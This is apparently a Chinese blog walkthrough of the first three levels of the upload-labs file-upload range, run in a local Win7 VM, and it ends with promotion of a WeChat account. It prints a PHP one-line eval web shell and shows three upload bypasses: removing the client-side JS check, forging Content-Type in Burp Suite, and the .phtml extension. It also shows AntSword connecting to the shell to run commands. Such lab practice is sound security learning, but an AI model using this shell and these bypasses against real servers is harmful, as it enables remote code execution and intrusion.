0、环境准备
0.1、安装靶场
由于自己的电脑是win10系统,上传一句话木马被系统自动拦截删除,文件上传的靶场安装在win7虚拟机。把upload-labs安装包复制到老版小皮的C:\phpstudy\PHPTutorial\WWW\目录下解压,然后启用小皮,启用服务Apache,在运行模板边上切换版本选择【php版本】5.2.17。(说明:为什么选择老版本的小皮,是由于我实验的文件上传靶场很多功能要实验通过,有版本要求,在新版本的小皮无法验证对应功能点。老版本的小皮在win7虚拟机有自带)
老版小皮在桌面的图标是这个
0.2、一句话木马
一句话木马文件命名onehack.php,在后面实验过程中都是同一个,源码内容如下
# 可连接服务端的
<?php
@eval($_POST['自定义密码'])
?>
打印服务器相关信息的,命名info.php
<?php phpinfo();?>
1、Pass-01
1.0、攻击思路
先按符合条件上传,上传前按F12,选择Network看请求URL,然后再按上传一句话木马的文件onehack.php,看是否请求,如果没有请求只是弹窗提示,那么先绕过前端的JS验证,再上传onehack.php看是否成功。
1.1、文件上传验证
正常上传一个图片,在网络看到请求URL是http://127.0.0.1/upload-labs/Pass-01/index.php
上传一句话木马,发现网络请求并没有变化,界面弹窗提示信息,因此可确定是属于前端JS验证。
1.2、木马上传
从上面的步骤初步确定是前端JS验证,也得知文件上传请求的URL,可以copy网页源码下来,去掉form里面的onsubmit="return checkFile()",需要自己手动添加action,然后把文件上传请求的URL放到form的action。然后访问该html文件pass01.html,选择onehack.php上传,发现上传成功了。
上传成功后会自己跳转到文件上传页面,如下
获取得到地址http://127.0.0.1/upload-labs/upload/onehack.php,在外部连接测试时,把127.0.0.1换成ipconfig查出的值就可以了。
1.3、蚁剑连接
使用蚁剑连接验证,可以连接成功,并且可以进入目标服务器的终端进行执行命令
2、Pass-02
2.0、攻击思路
直接上传一句话木马的文件info.php,上传前按F12,选择Network看请求URL,发现直接请求服务端,返回验证文件内容类型不通过信息,可以断定是服务端的验证,因此要想办法绕过。可用Burp Suite拦截来处理。
2.1、BurpSuite拦截
看到拦截的内容有Content-Type: application/octet-stream 把它修改为图片的值,不知道的情况可以用正常上传成功的值Content-Type: image/jpeg来替换,然后再点BP工具的Forward让提交到服务端。
在图片身上右击,选择新建标签页打开图像打开访问。
2.2、木马解析成功
3、Pass-03
3.0、攻击思路
直接上传一句话木马的文件info.php,上传前按F12,选择Network看请求URL,发现直接请求服务端,返回文件名后缀验证不通过信息,可以断定是服务端的验证,因此要想办法绕过。可用Burp Suite拦截来处理。
3.1、确认httpd.conf
httpd.conf文件在老版小皮Apache下,win7虚拟机路径是C:\phpstudy\PHPTutorial\Apache\conf\
由于后缀名的限制,要解析php文件,需要确认Apache的配置,在IfModule节点确认配置【application/x-httpd-php配置】,我在后面再添加了.php3 .php4 .html,除了php外有其他后缀名即可,在文件上传时可以用除.php外的后缀名解析为php。
AddType application/x-httpd-php .php .phtml .php3 .php4 .html
修改完保存一定要重启Apache服务才会生效。
3.2、上传文件
先上传一句话木马的文件info.php重命名为info.phtml,上传成功。
在图片身上右击,选择新建标签页打开图像打开访问。
3.3 、木马解析成功
4 、资料获取
请关注我的公众号:大象只为你,回复:文件上传,获取文件上传漏洞靶场。
如果之前没有下载过win7虚拟机的话,请回复关键字:虚拟机,获取win7虚拟机,加载到VM ware即可用。
5、下期内容预告
下期继续分享文件上传靶场实战,敬请关注我的公众号:大象只为你,持续更新中…
827
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
